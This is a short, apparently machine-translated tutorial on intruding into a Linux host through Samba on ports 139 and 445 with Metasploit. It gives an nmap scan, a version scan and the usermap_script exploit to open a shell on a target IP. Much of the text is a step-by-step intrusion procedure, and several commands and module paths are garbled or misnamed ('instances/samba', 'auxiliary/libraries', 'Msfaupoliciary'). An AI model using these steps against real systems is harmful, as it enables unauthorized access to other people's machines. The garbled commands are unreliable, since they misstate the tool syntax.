Intrude into linux Hosts using samba Service Vulnerabilities

Samba is a free software for implementing the SMB protocol on Linux and UNIX systems. It consists of servers and client programs. the ports of the samba service include 139 and 445. this article briefly introduces how metasploit intruded into a remote linux host using the samba vulnerability.

Step 1)First, scan the ports and services opened on the target host and use nmap. The command is as follows:

Nmap-sS-Pn-A 192.168.2.142

Step 2)After the port 139,445 opened on the host is found, it indicates that the host may have a remote samba service overflow vulnerability. To establish a meterpreter session through the port, metasploit is required.

Step 3)After enabling metasploit, you must first determine the samba version. The command is as follows:

-Msf> search instances/samba

This command is used to search for samba-related exploit parameters.

Step 4)Run the following command to define the exploits parameter used to scan samba versions.

Msf> use auxiliary/libraries/smb/smb_version

Msfaupoliciary (smb_version)> set RHOSTS 192.168.2.142

This command defines the IP address of the remote host that you want to scan for samba.

Exploit

This command begins to exploit the vulnerability.

Step 5)After the samba version is found, we need to further exploit it to intrude into the remote linux host.

Msf> use exploit/multi/samba/usermap_script

Msf exploit (usermap_script)> set RHOST 192.168.2.142

Msf exploit (usermap_script)> exploit

Run the preceding command to create a shell session.